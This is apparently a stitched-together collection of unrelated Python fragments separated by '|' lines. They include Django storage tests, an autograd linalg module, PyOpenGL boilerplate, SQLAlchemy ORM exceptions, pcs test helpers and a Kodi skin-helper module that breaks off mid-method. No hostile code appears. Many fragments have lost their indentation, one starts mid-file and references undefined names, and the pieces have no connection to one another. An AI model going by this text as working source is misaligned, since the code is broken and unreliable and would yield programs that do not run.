BuildStats = BaseBuildStats
TestExpectationMap = BaseTestExpectationMap
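# Hedged usage sketch: a minimal, runnable demonstration of the type checks
# these maps enforce. The builder and step names are illustrative only.
if __name__ == '__main__':
  _steps = StepBuildStatsMap()
  _steps['pixel_tests'] = BuildStats()      # str -> BuildStats is allowed
  _builders = BuilderStepMap()
  _builders['ci-builder'] = _steps          # str -> StepBuildStatsMap
  # _builders['ci-builder'] = 'not a map'   # would trip the type assert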
|
"""
42. Storing files according to a custom storage system
``FileField`` and its variations can take a ``storage`` argument to specify how
and where files should be stored.
"""
import random
import tempfile
from django.db import models
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
temp_storage_location = tempfile.mkdtemp()
temp_storage = FileSystemStorage(location=temp_storage_location)
class Storage(models.Model):
def custom_upload_to(self, filename):
return 'foo'
def random_upload_to(self, filename):
# This returns a different result each time,
# to make sure it only gets called once.
return '%s/%s' % (random.randint(100, 999), filename)
normal = models.FileField(storage=temp_storage, upload_to='tests')
custom = models.FileField(storage=temp_storage, upload_to=custom_upload_to)
random = models.FileField(storage=temp_storage, upload_to=random_upload_to)
default = models.FileField(storage=temp_storage, upload_to='tests', default='tests/default.txt')
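# Hedged usage note: Django passes (instance, filename) to callable
# ``upload_to`` targets, so the methods above receive the model instance as
# ``self``. Illustrative only (requires a configured database):
#
#   obj = Storage()
#   obj.custom.save('anything.txt', ContentFile('data'))
#   obj.custom.name   # 'foo', per custom_upload_to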
|
from __future__ import print_function
import argparse
import json
import os
_FILE_URL = 'https://dl.google.com/dl/android/maven2/com/google/firebase/firebase-messaging/21.0.1/firebase-messaging-21.0.1.aar'
_FILE_NAME = 'firebase-messaging-21.0.1.aar'
_FILE_VERSION = '21.0.1'
def do_latest():
print(_FILE_VERSION)
def get_download_url(version):
if _FILE_URL.endswith('.jar'):
ext = '.jar'
elif _FILE_URL.endswith('.aar'):
ext = '.aar'
else:
raise Exception('Unsupported extension for %s' % _FILE_URL)
partial_manifest = {
'url': [_FILE_URL],
'name': [_FILE_NAME],
'ext': ext,
}
print(json.dumps(partial_manifest))
def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
latest = sub.add_parser("latest")
latest.set_defaults(func=lambda _opts: do_latest())
download = sub.add_parser("get_url")
download.set_defaults(
func=lambda _opts: get_download_url(os.environ['_3PP_VERSION']))
opts = ap.parse_args()
opts.func(opts)
if __name__ == '__main__':
main()
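# Hedged usage sketch (the script file name is illustrative): a 3pp recipe
# drives the two subcommands separately.
#
#   $ python fetch.py latest
#   21.0.1
#   $ _3PP_VERSION=21.0.1 python fetch.py get_url
#   {"url": ["https://dl.google.com/..."], "name": ["firebase-messaging-21.0.1.aar"], "ext": ".aar"}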
|
from __future__ import absolute_import
import numpy.linalg as npla
from .numpy_wrapper import wrap_namespace, dot
from . import numpy_wrapper as anp
wrap_namespace(npla.__dict__, globals())
def atleast_2d_col(x):
# Promotes a 1D array into a column rather than a row.
return x if x.ndim > 1 else x[:,None]
inv.defgrad( lambda ans, x : lambda g : -dot(dot(ans.T, g), ans.T))
det.defgrad( lambda ans, x : lambda g : g * ans * inv(x).T)
slogdet.defgrad(lambda ans, x : lambda g : g[1] * inv(x).T)
solve.defgrad( lambda ans, a, b : lambda g : -dot(atleast_2d_col(solve(a.T, g)),
atleast_2d_col(ans).T))
solve.defgrad(lambda ans, a, b : lambda g : solve(a.T, g), argnum=1)
norm.defgrad( lambda ans, a : lambda g : dot(g, a/ans))
def make_grad_eigh(ans, x, UPLO='L'):
"""Gradient for eigenvalues and vectors of a symmetric matrix."""
N = x.shape[0]
w, v = ans # Eigenvalues, eigenvectors.
def eigh_grad(g):
wg, vg = g # Gradient w.r.t. eigenvalues, eigenvectors.
w_repeated = anp.repeat(w[:, anp.newaxis], N, 1)
off_diag = anp.ones((N, N)) - anp.eye(N)
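        # Off the diagonal, F[i, j] = 1 / (w[j] - w[i]); the identity added to
        # the denominator only avoids division by zero on the diagonal, where
        # off_diag zeroes the entry anyway.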
F = off_diag / (w_repeated.T - w_repeated + anp.eye(N))
dx = dot(v * wg + dot(v, F * dot(v.T, vg)), v.T)
if UPLO == 'U': # Reflect to account for symmetry.
return anp.triu(dx) + anp.tril(dx, -1).T
else:
return anp.tril(dx) + anp.triu(dx, 1).T
return eigh_grad
eigh.defgrad(make_grad_eigh)
|
from netforce.model import Model, fields, get_model
class BarcodeIssueLine(Model):
_name = "barcode.issue.line"
_transient = True
_fields = {
"wizard_id": fields.Many2One("barcode.issue", "Wizard", required=True, on_delete="cascade"),
"product_id": fields.Many2One("product", "Product", required=True),
"qty": fields.Decimal("Qty", required=True),
"uom_id": fields.Many2One("uom", "UoM", required=True),
"qty2": fields.Decimal("Secondary Qty"),
"lot_id": fields.Many2One("stock.lot", "Lot / Serial Number"),
"container_from_id": fields.Many2One("stock.container", "From Container"),
"container_to_id": fields.Many2One("stock.container", "To Container"),
"location_from_id": fields.Many2One("stock.location", "From Location"),
"location_to_id": fields.Many2One("stock.location", "To Location"),
"related_id": fields.Reference([["sale.order", "Sales Order"], ["purchase.order", "Purchase Order"]], "Related To"),
"qty2": fields.Decimal("Qty2"),
"notes": fields.Text("Notes"),
}
BarcodeIssueLine.register()
|
from txaws.server.method import Method
from txaws.server.tests.fixtures import method
@method
class TestMethod(Method):
pass
|
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
doc = DocumentManager.Instance.CurrentDBDocument
faminstances = UnwrapElement(IN[0])
booleans = []
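# Revit model edits must happen inside a transaction; Dynamo's
# TransactionManager opens one against the current document.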
TransactionManager.Instance.EnsureInTransaction(doc)
for item in faminstances:
try:
item.FlipFromToRoom()
booleans.append(True)
    except Exception:
booleans.append(False)
TransactionManager.Instance.TransactionTaskDone()
OUT = (faminstances, booleans)
|
import sys
from healthcareai.common.healthcareai_error import HealthcareAIError
def validate_pyodbc_is_loaded():
""" Simple check that alerts user if they are do not have pyodbc installed, which is not a requirement. """
if 'pyodbc' not in sys.modules:
raise HealthcareAIError('Using this function requires installation of pyodbc.')
def validate_sqlite3_is_loaded():
""" Simple check that alerts user if they are do not have sqlite installed, which is not a requirement. """
if 'sqlite3' not in sys.modules:
raise HealthcareAIError('Using this function requires installation of sqlite3.')
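# Hedged usage sketch: the guards above pass only if the optional module was
# already imported earlier (healthcareai attempts this at package import).
# The DSN below is illustrative only.
#
#   import pyodbc
#   validate_pyodbc_is_loaded()
#   connection = pyodbc.connect('DSN=example_dsn')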
|
def deleteNoneSpacelstrip(s):
    # Strip every leading newline, tab, NUL and space in one pass;
    # str.lstrip() with a character set keeps removing leading characters
    # until one outside the set is found.
    # e.g. deleteNoneSpacelstrip('\n\t  x\n') -> 'x\n'
    return s.lstrip('\n\t\0 ')
|
'''OpenGL extension ARB.fragment_program
This module customises the behaviour of the
OpenGL.raw.GL.ARB.fragment_program to provide a more
Python-friendly API
Overview (from the spec)
Unextended OpenGL mandates a certain set of configurable per-
fragment computations defining texture application, texture
environment, color sum, and fog operations. Several extensions have
added further per-fragment computations to OpenGL. For example,
extensions have defined new texture environment capabilities
(ARB_texture_env_add, ARB_texture_env_combine, ARB_texture_env_dot3,
ARB_texture_env_crossbar), per-fragment depth comparisons
(ARB_depth_texture, ARB_shadow, ARB_shadow_ambient,
EXT_shadow_funcs), per-fragment lighting (EXT_fragment_lighting,
EXT_light_texture), and environment mapped bump mapping
(ATI_envmap_bumpmap).
Each such extension adds a small set of relatively inflexible per-
fragment computations.
This inflexibility is in contrast to the typical flexibility
provided by the underlying programmable floating point engines
(whether micro-coded fragment engines, DSPs, or CPUs) that are
traditionally used to implement OpenGL's texturing computations.
The purpose of this extension is to expose to the OpenGL application
writer a significant degree of per-fragment programmability for
computing fragment parameters.
For the purposes of discussing this extension, a fragment program is
a sequence of floating-point 4-component vector operations that
determines how a set of program parameters (not specific to an
individual fragment) and an input set of per-fragment parameters are
transformed to a set of per-fragment result parameters.
The per-fragment computations for standard OpenGL given a particular
set of texture and fog application modes (along with any state for
extensions defining per-fragment computations) is, in essence, a
fragment program. However, the sequence of operations is defined
implicitly by the current OpenGL state settings rather than defined
explicitly as a sequence of instructions.
This extension provides an explicit mechanism for defining fragment
program instruction sequences for application-defined fragment
programs. In order to define such fragment programs, this extension
defines a fragment programming model including a floating-point
4-component vector instruction set and a relatively large set of
floating-point 4-component registers.
The extension's fragment programming model is designed for efficient
hardware implementation and to support a wide variety of fragment
programs. By design, the entire set of existing fragment programs
defined by existing OpenGL per-fragment computation extensions can
be implemented using the extension's fragment programming model.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/fragment_program.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ARB.fragment_program import *
glget.addGLGetConstant( GL_FRAGMENT_PROGRAM_ARB, (1,) )
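# Hedged usage sketch (glIsEnabled is PyOpenGL's standard API; requires a
# live GL context):
#
#   from OpenGL.GL import glIsEnabled
#   fragment_program_enabled = glIsEnabled(GL_FRAGMENT_PROGRAM_ARB)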
|
import base64
import json
from pcs_test.tools.command_env.mock_node_communicator import (
place_multinode_call,
)
class FilesShortcuts:
def __init__(self, calls):
self.__calls = calls
def put_files(
self,
node_labels=None,
pcmk_authkey=None,
corosync_authkey=None,
corosync_conf=None,
pcs_disaster_recovery_conf=None,
pcs_settings_conf=None,
communication_list=None,
name="http.files.put_files",
):
# pylint: disable=too-many-arguments
"""
Create a call for the files distribution to the nodes.
node_labels list -- create success responses from these nodes
pcmk_authkey bytes -- content of pacemaker authkey file
corosync_authkey bytes -- content of corosync authkey file
corosync_conf string -- content of corosync.conf
pcs_disaster_recovery_conf string -- content of pcs DR config
pcs_settings_conf string -- content of pcs_settings.conf
communication_list list -- create custom responses
name string -- the key of this call
"""
input_data = {}
output_data = {}
written_output_dict = dict(
code="written",
message="",
)
if pcmk_authkey:
file_id = "pacemaker_remote authkey"
input_data[file_id] = dict(
data=base64.b64encode(pcmk_authkey).decode("utf-8"),
type="pcmk_remote_authkey",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
if corosync_authkey:
file_id = "corosync authkey"
input_data[file_id] = dict(
data=base64.b64encode(corosync_authkey).decode("utf-8"),
type="corosync_authkey",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
if corosync_conf:
file_id = "corosync.conf"
input_data[file_id] = dict(
data=corosync_conf,
type="corosync_conf",
)
output_data[file_id] = written_output_dict
if pcs_disaster_recovery_conf:
file_id = "disaster-recovery config"
input_data[file_id] = dict(
data=base64.b64encode(pcs_disaster_recovery_conf).decode(
"utf-8"
),
type="pcs_disaster_recovery_conf",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
if pcs_settings_conf:
file_id = "pcs_settings.conf"
input_data[file_id] = dict(
data=pcs_settings_conf,
type="pcs_settings_conf",
rewrite_existing=True,
)
output_data[file_id] = written_output_dict
place_multinode_call(
self.__calls,
name,
node_labels,
communication_list,
action="remote/put_file",
param_list=[("data_json", json.dumps(input_data))],
output=json.dumps(dict(files=output_data)),
)
def remove_files(
self,
node_labels=None,
pcsd_settings=False,
pcs_disaster_recovery_conf=False,
communication_list=None,
name="http.files.remove_files",
):
"""
Create a call for removing the files on the nodes.
node_labels list -- create success responses from these nodes
pcsd_settings bool -- if True, remove file pcsd_settings
pcs_disaster_recovery_conf bool -- if True, remove pcs DR config
communication_list list -- create custom responses
name string -- the key of this call
"""
input_data = {}
output_data = {}
if pcsd_settings:
file_id = "pcsd settings"
input_data[file_id] = dict(type="pcsd_settings")
output_data[file_id] = dict(
code="deleted",
message="",
)
if pcs_disaster_recovery_conf:
file_id = "pcs disaster-recovery config"
input_data[file_id] = dict(type="pcs_disaster_recovery_conf")
output_data[file_id] = dict(
code="deleted",
message="",
)
place_multinode_call(
self.__calls,
name,
node_labels,
communication_list,
action="remote/remove_file",
param_list=[("data_json", json.dumps(input_data))],
output=json.dumps(dict(files=output_data)),
)
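# Hedged usage sketch inside a test (the ``config`` fixture object is
# illustrative; the keyword arguments mirror the shortcut methods above):
#
#   config.http.files.put_files(
#       node_labels=["node-1", "node-2"],
#       corosync_authkey=b"secret key",
#   )
#   config.http.files.remove_files(
#       node_labels=["node-1", "node-2"],
#       pcsd_settings=True,
#   )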
|
"""SQLAlchemy ORM exceptions."""
from .. import exc as sa_exc
from .. import util
NO_STATE = (AttributeError, KeyError)
"""Exception types that may be raised by instrumentation implementations."""
class StaleDataError(sa_exc.SQLAlchemyError):
"""An operation encountered database state that is unaccounted for.
Conditions which cause this to happen include:
* A flush may have attempted to update or delete rows
and an unexpected number of rows were matched during
the UPDATE or DELETE statement. Note that when
version_id_col is used, rows in UPDATE or DELETE statements
are also matched against the current known version
identifier.
* A mapped object with version_id_col was refreshed,
and the version number coming back from the database does
not match that of the object itself.
    * An object is detached from its parent object; however,
      the object was previously attached to a different parent
      identity which was garbage collected, and a decision
      cannot be made as to whether the new parent was really
      the most recent "parent".
"""
ConcurrentModificationError = StaleDataError
class FlushError(sa_exc.SQLAlchemyError):
"""A invalid condition was detected during flush()."""
class UnmappedError(sa_exc.InvalidRequestError):
"""Base for exceptions that involve expected mappings not present."""
class ObjectDereferencedError(sa_exc.SQLAlchemyError):
"""An operation cannot complete due to an object being garbage
collected.
"""
class DetachedInstanceError(sa_exc.SQLAlchemyError):
"""An attempt to access unloaded attributes on a
mapped instance that is detached."""
code = "bhk3"
class UnmappedInstanceError(UnmappedError):
"""An mapping operation was requested for an unknown instance."""
@util.dependencies("sqlalchemy.orm.base")
def __init__(self, base, obj, msg=None):
if not msg:
try:
base.class_mapper(type(obj))
name = _safe_cls_name(type(obj))
msg = (
"Class %r is mapped, but this instance lacks "
"instrumentation. This occurs when the instance "
"is created before sqlalchemy.orm.mapper(%s) "
"was called." % (name, name)
)
except UnmappedClassError:
msg = _default_unmapped(type(obj))
if isinstance(obj, type):
msg += (
"; was a class (%s) supplied where an instance was "
"required?" % _safe_cls_name(obj)
)
UnmappedError.__init__(self, msg)
def __reduce__(self):
return self.__class__, (None, self.args[0])
class UnmappedClassError(UnmappedError):
"""An mapping operation was requested for an unknown class."""
def __init__(self, cls, msg=None):
if not msg:
msg = _default_unmapped(cls)
UnmappedError.__init__(self, msg)
def __reduce__(self):
return self.__class__, (None, self.args[0])
class ObjectDeletedError(sa_exc.InvalidRequestError):
"""A refresh operation failed to retrieve the database
row corresponding to an object's known primary key identity.
A refresh operation proceeds when an expired attribute is
accessed on an object, or when :meth:`_query.Query.get` is
used to retrieve an object which is, upon retrieval, detected
as expired. A SELECT is emitted for the target row
based on primary key; if no row is returned, this
exception is raised.
The true meaning of this exception is simply that
no row exists for the primary key identifier associated
with a persistent object. The row may have been
deleted, or in some cases the primary key updated
to a new value, outside of the ORM's management of the target
object.
"""
@util.dependencies("sqlalchemy.orm.base")
def __init__(self, base, state, msg=None):
if not msg:
msg = (
"Instance '%s' has been deleted, or its "
"row is otherwise not present." % base.state_str(state)
)
sa_exc.InvalidRequestError.__init__(self, msg)
def __reduce__(self):
return self.__class__, (None, self.args[0])
class UnmappedColumnError(sa_exc.InvalidRequestError):
"""Mapping operation was requested on an unknown column."""
class NoResultFound(sa_exc.InvalidRequestError):
"""A database result was required but none was found."""
class MultipleResultsFound(sa_exc.InvalidRequestError):
"""A single database result was required but more than one were found."""
class LoaderStrategyException(sa_exc.InvalidRequestError):
"""A loader strategy for an attribute does not exist."""
def __init__(
self,
applied_to_property_type,
requesting_property,
applies_to,
actual_strategy_type,
strategy_key,
):
if actual_strategy_type is None:
sa_exc.InvalidRequestError.__init__(
self,
"Can't find strategy %s for %s"
% (strategy_key, requesting_property),
)
else:
sa_exc.InvalidRequestError.__init__(
self,
'Can\'t apply "%s" strategy to property "%s", '
'which is a "%s"; this loader strategy is intended '
'to be used with a "%s".'
% (
util.clsname_as_plain_name(actual_strategy_type),
requesting_property,
util.clsname_as_plain_name(applied_to_property_type),
util.clsname_as_plain_name(applies_to),
),
)
def _safe_cls_name(cls):
try:
cls_name = ".".join((cls.__module__, cls.__name__))
except AttributeError:
cls_name = getattr(cls, "__name__", None)
if cls_name is None:
cls_name = repr(cls)
return cls_name
@util.dependencies("sqlalchemy.orm.base")
def _default_unmapped(base, cls):
try:
mappers = base.manager_of_class(cls).mappers
except NO_STATE:
mappers = {}
except TypeError:
mappers = {}
name = _safe_cls_name(cls)
if not mappers:
return "Class '%s' is not mapped" % name
|
'''
script.skin.helper.service
Helper service and scripts for Kodi skins
mainmodule.py
All script methods provided by the addon
'''
import xbmc
import xbmcvfs
import xbmcgui
import xbmcaddon
from skinsettings import SkinSettings
from simplecache import SimpleCache
from utils import log_msg, KODI_VERSION
from utils import log_exception, get_current_content_type, ADDON_ID, recursive_delete_dir
from dialogselect import DialogSelect
from xml.dom.minidom import parse
from metadatautils import KodiDb, process_method_on_list
import urlparse
import sys
class MainModule:
'''mainmodule provides the script methods for the skinhelper addon'''
def __init__(self):
'''Initialization and main code run'''
self.win = xbmcgui.Window(10000)
self.addon = xbmcaddon.Addon(ADDON_ID)
self.kodidb = KodiDb()
self.cache = SimpleCache()
self.params = self.get_params()
log_msg("MainModule called with parameters: %s" % self.params)
action = self.params.get("action", "")
# launch module for action provided by this script
try:
getattr(self, action)()
except AttributeError:
log_exception(__name__, "No such action: %s" % action)
except Exception as exc:
log_exception(__name__, exc)
finally:
xbmc.executebuiltin("dialog.Close(busydialog)")
# do cleanup
self.close()
def close(self):
'''Cleanup Kodi Cpython instances on exit'''
self.cache.close()
del self.win
del self.addon
del self.kodidb
log_msg("MainModule exited")
    @classmethod
    def get_params(cls):
'''extract the params from the called script path'''
params = {}
for arg in sys.argv[1:]:
paramname = arg.split('=')[0]
paramvalue = arg.replace(paramname + "=", "")
paramname = paramname.lower()
if paramname == "action":
paramvalue = paramvalue.lower()
params[paramname] = paramvalue
return params
def deprecated_method(self, newaddon):
'''
used when one of the deprecated methods is called
print warning in log and call the external script with the same parameters
'''
action = self.params.get("action")
log_msg("Deprecated method: %s. Please call %s directly" % (action, newaddon), xbmc.LOGWARNING)
paramstring = ""
for key, value in self.params.iteritems():
paramstring += ",%s=%s" % (key, value)
if xbmc.getCondVisibility("System.HasAddon(%s)" % newaddon):
xbmc.executebuiltin("RunAddon(%s%s)" % (newaddon, paramstring))
else:
# trigger install of the addon
if KODI_VERSION > 16:
xbmc.executebuiltin("InstallAddon(%s)" % newaddon)
else:
xbmc.executebuiltin("RunPlugin(plugin://%s)" % newaddon)
@staticmethod
def musicsearch():
'''helper to go directly to music search dialog'''
xbmc.executebuiltin("ActivateWindow(Music)")
xbmc.executebuiltin("SendClick(8)")
def setview(self):
'''sets the selected viewmode for the container'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
content_type = get_current_content_type()
if not content_type:
content_type = "files"
current_view = xbmc.getInfoLabel("Container.Viewmode").decode("utf-8")
view_id, view_label = self.selectview(content_type, current_view)
current_forced_view = xbmc.getInfoLabel("Skin.String(SkinHelper.ForcedViews.%s)" % content_type)
if view_id is not None:
# also store forced view
if (content_type and current_forced_view and current_forced_view != "None" and
xbmc.getCondVisibility("Skin.HasSetting(SkinHelper.ForcedViews.Enabled)")):
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s,%s)" % (content_type, view_id))
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s.label,%s)" % (content_type, view_label))
self.win.setProperty("SkinHelper.ForcedView", view_id)
if not xbmc.getCondVisibility("Control.HasFocus(%s)" % current_forced_view):
xbmc.sleep(100)
xbmc.executebuiltin("Container.SetViewMode(%s)" % view_id)
xbmc.executebuiltin("SetFocus(%s)" % view_id)
else:
self.win.clearProperty("SkinHelper.ForcedView")
# set view
xbmc.executebuiltin("Container.SetViewMode(%s)" % view_id)
def selectview(self, content_type="other", current_view=None, display_none=False):
'''reads skinfile with all views to present a dialog to choose from'''
cur_view_select_id = None
label = ""
all_views = []
if display_none:
listitem = xbmcgui.ListItem(label="None")
listitem.setProperty("id", "None")
all_views.append(listitem)
# read the special skin views file
views_file = xbmc.translatePath('special://skin/extras/views.xml').decode("utf-8")
if xbmcvfs.exists(views_file):
doc = parse(views_file)
listing = doc.documentElement.getElementsByTagName('view')
itemcount = 0
for view in listing:
label = xbmc.getLocalizedString(int(view.attributes['languageid'].nodeValue))
viewid = view.attributes['value'].nodeValue
mediatypes = view.attributes['type'].nodeValue.lower().split(",")
if label.lower() == current_view.lower() or viewid == current_view:
cur_view_select_id = itemcount
if display_none:
cur_view_select_id += 1
if (("all" in mediatypes or content_type.lower() in mediatypes) and
(not "!" + content_type.lower() in mediatypes) and not
xbmc.getCondVisibility("Skin.HasSetting(SkinHelper.view.Disabled.%s)" % viewid)):
image = "special://skin/extras/viewthumbs/%s.jpg" % viewid
listitem = xbmcgui.ListItem(label=label, iconImage=image)
listitem.setProperty("viewid", viewid)
listitem.setProperty("icon", image)
all_views.append(listitem)
itemcount += 1
dialog = DialogSelect("DialogSelect.xml", "", listing=all_views,
windowtitle=self.addon.getLocalizedString(32012), richlayout=True)
dialog.autofocus_id = cur_view_select_id
dialog.doModal()
result = dialog.result
del dialog
if result:
viewid = result.getProperty("viewid")
label = result.getLabel().decode("utf-8")
return (viewid, label)
else:
return (None, None)
# pylint: disable-msg=too-many-local-variables
def enableviews(self):
'''show select dialog to enable/disable views'''
all_views = []
views_file = xbmc.translatePath('special://skin/extras/views.xml').decode("utf-8")
richlayout = self.params.get("richlayout", "") == "true"
if xbmcvfs.exists(views_file):
doc = parse(views_file)
listing = doc.documentElement.getElementsByTagName('view')
for view in listing:
view_id = view.attributes['value'].nodeValue
label = xbmc.getLocalizedString(int(view.attributes['languageid'].nodeValue))
desc = label + " (" + str(view_id) + ")"
image = "special://skin/extras/viewthumbs/%s.jpg" % view_id
listitem = xbmcgui.ListItem(label=label, label2=desc, iconImage=image)
listitem.setProperty("viewid", view_id)
if not xbmc.getCondVisibility("Skin.HasSetting(SkinHelper.view.Disabled.%s)" % view_id):
listitem.select(selected=True)
excludefromdisable = False
try:
excludefromdisable = view.attributes['excludefromdisable'].nodeValue == "true"
except Exception:
pass
if not excludefromdisable:
all_views.append(listitem)
dialog = DialogSelect(
"DialogSelect.xml",
"",
listing=all_views,
windowtitle=self.addon.getLocalizedString(32013),
multiselect=True, richlayout=richlayout)
dialog.doModal()
result = dialog.result
del dialog
if result:
for item in result:
view_id = item.getProperty("viewid")
if item.isSelected():
# view is enabled
xbmc.executebuiltin("Skin.Reset(SkinHelper.view.Disabled.%s)" % view_id)
else:
# view is disabled
xbmc.executebuiltin("Skin.SetBool(SkinHelper.view.Disabled.%s)" % view_id)
# pylint: enable-msg=too-many-local-variables
def setforcedview(self):
'''helper that sets a forced view for a specific content type'''
content_type = self.params.get("contenttype")
if content_type:
current_view = xbmc.getInfoLabel("Skin.String(SkinHelper.ForcedViews.%s)" % content_type)
if not current_view:
current_view = "0"
view_id, view_label = self.selectview(content_type, current_view, True)
if view_id or view_label:
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s,%s)" % (content_type, view_id))
xbmc.executebuiltin("Skin.SetString(SkinHelper.ForcedViews.%s.label,%s)" % (content_type, view_label))
@staticmethod
def get_youtube_listing(searchquery):
'''get items from youtube plugin by query'''
lib_path = u"plugin://plugin.video.youtube/kodion/search/query/?q=%s" % searchquery
return KodiDb().files(lib_path)
def searchyoutube(self):
'''helper to search youtube for the given title'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
title = self.params.get("title", "")
window_header = self.params.get("header", "")
results = []
for media in self.get_youtube_listing(title):
if not media["filetype"] == "directory":
label = media["label"]
label2 = media["plot"]
image = ""
if media.get('art'):
if media['art'].get('thumb'):
image = (media['art']['thumb'])
listitem = xbmcgui.ListItem(label=label, label2=label2, iconImage=image)
listitem.setProperty("path", media["file"])
results.append(listitem)
# finished lookup - display listing with results
xbmc.executebuiltin("dialog.Close(busydialog)")
dialog = DialogSelect("DialogSelect.xml", "", listing=results, windowtitle=window_header,
multiselect=False, richlayout=True)
dialog.doModal()
result = dialog.result
del dialog
if result:
if xbmc.getCondVisibility(
"Window.IsActive(script-skin_helper_service-CustomInfo.xml) | "
"Window.IsActive(movieinformation)"):
xbmc.executebuiltin("Dialog.Close(movieinformation)")
xbmc.executebuiltin("Dialog.Close(script-skin_helper_service-CustomInfo.xml)")
xbmc.sleep(1000)
xbmc.executebuiltin('PlayMedia("%s")' % result.getProperty("path"))
del result
def getcastmedia(self):
'''helper to show a dialog with all media for a specific actor'''
xbmc.executebuiltin("ActivateWindow(busydialog)")
name = self.params.get("name", "")
window_header = self.params.get("name", "")
results = []
items = self.kodidb.castmedia(name)
items = process_method_on_list(self.kodidb.prepare_listitem, items)
for item in items:
if item["file"].startswith("videodb://"):
item["file"] = "ActivateWindow(Videos,%s,return)" % item["file"]
else:
item["file"] = 'PlayMedia("%s")' % item["file"]
results.append(self.kodidb.create_listitem(item, False))
# finished lookup - display listing with results
xbmc.executebuiltin("dialog.Close(busydialog)")
dialog = DialogSelect("DialogSelect.xml", "", listing=results, windowtitle=window_header, richlayout=True)
dialog.doModal()
result = dialog.result
del dialog
if result:
while xbmc.getCondVisibility("System.HasModalDialog"):
xbmc.executebuiltin("Action(Back)")
xbmc.sleep(300)
xbmc.executebuiltin(result.getfilename())
del result
def setfocus(self):
'''helper to set focus on a list or control'''
control = self.params.get("control")
fallback = self.params.get("fallback")
position = self.params.get("position", "0")
relativeposition = self.params.get("relativeposition")
if relativeposition:
position = int(relativeposition) - 1
count = 0
if control:
while not xbmc.getCondVisibility("Control.HasFocus(%s)" % control):
if xbmc.getCondVisibility("Window.IsActive(busydialog)"):
xbmc.sleep(150)
continue
elif count == 20 or (xbmc.getCondVisibility(
"!Control.IsVisible(%s) | "
"!IntegerGreaterThan(Container(%s).NumItems,0)" % (control, control))):
if fallback:
xbmc.executebuiltin("Control.SetFocus(%s)" % fallback)
break
else:
xbmc.executebuiltin("Control.SetFocus(%s,%s)" % (control, position))
xbmc.sleep(50)
count += 1
def setwidgetcontainer(self):
'''helper that reports the current selected widget container/control'''
controls = self.params.get("controls", "").split("-")
if controls:
xbmc.sleep(50)
for i in range(10):
for control in controls:
if xbmc.getCondVisibility("Control.IsVisible(%s) + IntegerGreaterThan(Container(%s).NumItems,0)"
% (control, control)):
self.win.setProperty("SkinHelper.WidgetContainer", control)
return
xbmc.sleep(50)
self.win.clearProperty("SkinHelper.WidgetContainer")
def saveskinimage(self):
'''let the user select an image and save it to addon_data for easy backup'''
skinstring = self.params.get("skinstring", "")
allow_multi = self.params.get("multi", "") == "true"
header = self.params.get("header", "")
value = SkinSettings().save_skin_image(skinstring, allow_multi, header)
if value:
xbmc.executebuiltin("Skin.SetString(%s,%s)" % (skinstring.encode("utf-8"), value.encode("utf-8")))
@staticmethod
def checkskinsettings():
'''performs check of all default skin settings and labels'''
SkinSettings().correct_skin_settings()
def setskinsetting(self):
'''allows the user to set a skin setting with a select dialog'''
setting = self.params.get("setting", "")
org_id = self.params.get("id", "")
if "$" in org_id:
org_id = xbmc.getInfoLabel(org_id).decode("utf-8")
header = self.params.get("header", "")
SkinSettings().set_skin_setting(setting=setting, window_header=header, original_id=org_id)
def setskinconstant(self):
'''allows the user to set a skin constant with a select dialog'''
setting = self.params.get("setting", "")
value = self.params.get("value", "")
header = self.params.get("header", "")
SkinSettings().set_skin_constant(setting, header, value)
def setskinconstants(self):
'''allows the skinner to set multiple skin constants'''
settings = self.params.get("settings", "").split("|")
values = self.params.get("values", "").split("|")
SkinSettings().set_skin_constants(settings, values)
def setskinshortcutsproperty(self):
'''allows the user to make a setting for skinshortcuts using the special skinsettings dialogs'''
setting = self.params.get("setting", "")
prop = self.params.get("property", "")
header = self.params.get("header", "")
SkinSettings().set_skinshortcuts_property(setting, header, prop)
def togglekodisetting(self):
'''toggle kodi setting'''
settingname = self.params.get("setting", "")
cur_value = xbmc.getCondVisibility("system.getbool(%s)" % settingname)
if cur_value:
new_value = "false"
else:
new_value = "true"
xbmc.executeJSONRPC(
'{"jsonrpc":"2.0", "id":1, "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}}' %
(settingname, new_value))
def setkodisetting(self):
'''set kodi setting'''
settingname = self.params.get("setting", "")
value = self.params.get("value", "")
is_int = False
try:
valueint = int(value)
is_int = True
del valueint
except Exception:
pass
if value.lower() == "true":
value = 'true'
elif value.lower() == "false":
value = 'false'
elif is_int:
value = '"%s"' % value
xbmc.executeJSONRPC('{"jsonrpc":"2.0", "id":1, "method":"Settings.SetSettingValue",\
"params":{"setting":"%s","value":%s}}' % (settingname, value))
def playtrailer(self):
'''auto play windowed trailer inside video listing'''
if not xbmc.getCondVisibility("Player.HasMedia | Container.Scrolling | Container.OnNext | "
"Container.OnPrevious | !IsEmpty(Window(Home).Property(traileractionbusy))"):
self.win.setProperty("traileractionbusy", "traileractionbusy")
widget_container = self.params.get("widgetcontainer", "")
trailer_mode = self.params.get("mode", "").replace("auto_", "")
allow_youtube = self.params.get("youtube", "") == "true"
if not trailer_mode:
trailer_mode = "windowed"
if widget_container:
widget_container_prefix = "Container(%s)." % widget_container
else:
widget_container_prefix = ""
li_title = xbmc.getInfoLabel("%sListItem.Title" % widget_container_prefix).decode('utf-8')
li_trailer = xbmc.getInfoLabel("%sListItem.Trailer" % widget_container_prefix).decode('utf-8')
if not li_trailer and allow_youtube:
youtube_result = self.get_youtube_listing("%s Trailer" % li_title)
if youtube_result:
li_trailer = youtube_result[0].get("file")
# always wait a bit to prevent trailer start playing when we're scrolling the list
xbmc.Monitor().waitForAbort(3)
